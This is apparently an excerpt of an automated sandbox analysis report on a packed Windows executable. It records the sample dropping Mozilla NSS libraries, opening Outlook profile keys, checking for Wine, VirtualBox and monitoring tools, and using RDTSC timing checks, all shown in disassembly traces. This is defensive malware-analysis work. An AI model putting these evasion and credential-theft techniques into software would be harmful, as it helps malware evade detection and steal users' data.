Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: zUKf62kgkm.exe Static file information: File size 1822720 > 1048576
Source: zUKf62kgkm.exe Static PE information: Raw size of psmndnck is bigger than: 0x100000 < 0x1a2a00
Source: Binary string: mozglue.pdbP source: zUKf62kgkm.exe, 00000000.00000002.2101456032.000000006C4CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: zUKf62kgkm.exe, 00000000.00000002.2101748953.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: zUKf62kgkm.exe, 00000000.00000002.2101748953.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: zUKf62kgkm.exe, 00000000.00000002.2101456032.000000006C4CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Unpacked PE file: 0.2.zUKf62kgkm.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;psmndnck:EW;ftfluxxw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;psmndnck:EW;ftfluxxw:EW;.taggant:EW;
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4BC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C4BC410
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: zUKf62kgkm.exe Static PE information: real checksum: 0x1c6c76 should be: 0x1c67e9
Source: zUKf62kgkm.exe Static PE information: section name:
Source: zUKf62kgkm.exe Static PE information: section name: .idata
Source: zUKf62kgkm.exe Static PE information: section name:
Source: zUKf62kgkm.exe Static PE information: section name: psmndnck
Source: zUKf62kgkm.exe Static PE information: section name: ftfluxxw
Source: zUKf62kgkm.exe Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C48B536 push ecx; ret 0_2_6C48B549
Source: zUKf62kgkm.exe Static PE information: section name: psmndnck entropy: 7.954210996924058
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4B55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C4B55F0

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 12000CF second address: 12000D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FCB4545A1A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 12000D9 second address: 11FF974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b clc 0x0000000c push dword ptr [ebp+122D0939h] 0x00000012 xor dword ptr [ebp+122D2BCFh], eax 0x00000018 call dword ptr [ebp+122D1E90h] 0x0000001e pushad 0x0000001f mov dword ptr [ebp+122D2BC0h], ebx 0x00000025 xor eax, eax 0x00000027 jmp 00007FCB44FB454Dh 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 cld 0x00000031 mov dword ptr [ebp+122D35D0h], eax 0x00000037 sub dword ptr [ebp+122D290Bh], esi 0x0000003d mov esi, 0000003Ch 0x00000042 pushad 0x00000043 mov ecx, dword ptr [ebp+122D3748h] 0x00000049 movzx edx, ax 0x0000004c popad 0x0000004d mov dword ptr [ebp+122D2A1Bh], edx 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 jmp 00007FCB44FB4555h 0x0000005c lodsw 0x0000005e mov dword ptr [ebp+122D2BBBh], edi 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jbe 00007FCB44FB455Dh 0x0000006e jmp 00007FCB44FB4557h 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 mov dword ptr [ebp+122D3197h], eax 0x0000007d jmp 00007FCB44FB454Bh 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 11FF974 second address: 11FF978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 11FF978 second address: 11FF97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 11FF97C second address: 11FF982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136E9F2 second address: 136E9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136E9F6 second address: 136EA00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136EA00 second address: 136EA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137813F second address: 1378147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1378147 second address: 137814B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137814B second address: 1378161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FCB4545A1B2h 0x0000000e jnp 00007FCB4545A1A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137842A second address: 137842E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1378950 second address: 137895A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137895A second address: 137895E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B14E second address: 137B158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B158 second address: 137B1AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB454Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov esi, 0E4DE637h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FCB44FB4548h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D2B8Fh] 0x00000032 call 00007FCB44FB4549h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FCB44FB454Ah 0x0000003e rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B1AA second address: 137B1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B1B0 second address: 137B1D4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCB44FB4546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007FCB44FB454Eh 0x00000013 jno 00007FCB44FB4548h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B1D4 second address: 137B1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B1D8 second address: 137B277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 ja 00007FCB44FB454Eh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FCB44FB4557h 0x00000018 pop eax 0x00000019 mov si, ax 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007FCB44FB4548h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov ecx, ebx 0x0000003a push 00000000h 0x0000003c mov edi, dword ptr [ebp+122D357Ch] 0x00000042 push 00000003h 0x00000044 push esi 0x00000045 jmp 00007FCB44FB4550h 0x0000004a pop ecx 0x0000004b call 00007FCB44FB4549h 0x00000050 js 00007FCB44FB4558h 0x00000056 jmp 00007FCB44FB4552h 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B277 second address: 137B2B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FCB4545A1B0h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jns 00007FCB4545A1B8h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jbe 00007FCB4545A1B4h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B2B9 second address: 137B2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B2BF second address: 137B2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 movzx edx, ax 0x00000009 lea ebx, dword ptr [ebp+1244F031h] 0x0000000f jmp 00007FCB4545A1B0h 0x00000014 xchg eax, ebx 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007FCB4545A1A6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B2E8 second address: 137B301 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCB44FB4546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FCB44FB4546h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B301 second address: 137B305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B331 second address: 137B35A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCB44FB454Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d clc 0x0000000e push 00000000h 0x00000010 cld 0x00000011 call 00007FCB44FB4549h 0x00000016 push edx 0x00000017 jl 00007FCB44FB454Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B35A second address: 137B399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push esi 0x00000019 jmp 00007FCB4545A1B0h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jmp 00007FCB4545A1ACh 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B399 second address: 137B454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 cld 0x00000009 push 00000003h 0x0000000b mov cx, si 0x0000000e push 00000000h 0x00000010 mov cx, ax 0x00000013 push 00000003h 0x00000015 add dword ptr [ebp+122D2BC0h], edx 0x0000001b call 00007FCB44FB4549h 0x00000020 je 00007FCB44FB4550h 0x00000026 jmp 00007FCB44FB454Ah 0x0000002b push eax 0x0000002c pushad 0x0000002d pushad 0x0000002e jmp 00007FCB44FB4555h 0x00000033 jmp 00007FCB44FB4552h 0x00000038 popad 0x00000039 jmp 00007FCB44FB4554h 0x0000003e popad 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 pushad 0x00000044 push ebx 0x00000045 pushad 0x00000046 popad 0x00000047 pop ebx 0x00000048 pushad 0x00000049 jmp 00007FCB44FB4551h 0x0000004e jmp 00007FCB44FB454Ah 0x00000053 popad 0x00000054 popad 0x00000055 mov eax, dword ptr [eax] 0x00000057 jg 00007FCB44FB4554h 0x0000005d mov dword ptr [esp+04h], eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push esi 0x00000064 push edi 0x00000065 pop edi 0x00000066 pop esi 0x00000067 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B454 second address: 137B464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCB4545A1ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B464 second address: 137B468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B535 second address: 137B573 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCB4545A1A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cx, dx 0x0000000e mov dword ptr [ebp+122D3251h], esi 0x00000014 push 00000000h 0x00000016 mov ecx, dword ptr [ebp+122D3898h] 0x0000001c push 7CEE1C20h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FCB4545A1B9h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B573 second address: 137B57D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCB44FB454Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B57D second address: 137B62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 7CEE1CA0h 0x0000000d mov esi, dword ptr [ebp+122D365Ch] 0x00000013 push 00000003h 0x00000015 mov dword ptr [ebp+122D34F4h], esi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007FCB4545A1A8h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 stc 0x00000038 mov dword ptr [ebp+122D1D3Ah], ebx 0x0000003e push 00000003h 0x00000040 mov edx, dword ptr [ebp+122D205Fh] 0x00000046 push 972B2935h 0x0000004b jnp 00007FCB4545A1B3h 0x00000051 jmp 00007FCB4545A1ADh 0x00000056 add dword ptr [esp], 28D4D6CBh 0x0000005d mov dword ptr [ebp+122D20B1h], esi 0x00000063 lea ebx, dword ptr [ebp+1244F045h] 0x00000069 push edi 0x0000006a cmc 0x0000006b pop ecx 0x0000006c xchg eax, ebx 0x0000006d pushad 0x0000006e jnl 00007FCB4545A1B3h 0x00000074 jmp 00007FCB4545A1ADh 0x00000079 jmp 00007FCB4545A1B4h 0x0000007e popad 0x0000007f push eax 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B62B second address: 137B62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B62F second address: 137B635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137B635 second address: 137B63B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139BC33 second address: 139BC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCB4545A1ACh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FCB4545A1B6h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139BC61 second address: 139BC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139BE04 second address: 139BE0E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCB4545A1A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139BE0E second address: 139BE1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FCB44FB454Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139BE1E second address: 139BE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139BF5F second address: 139BF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007FCB44FB4546h 0x0000000e jno 00007FCB44FB4546h 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139C0D3 second address: 139C0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139C0D7 second address: 139C0DD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139C262 second address: 139C280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCB4545A1B5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139C54B second address: 139C558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139CA18 second address: 139CA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139CB8B second address: 139CB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
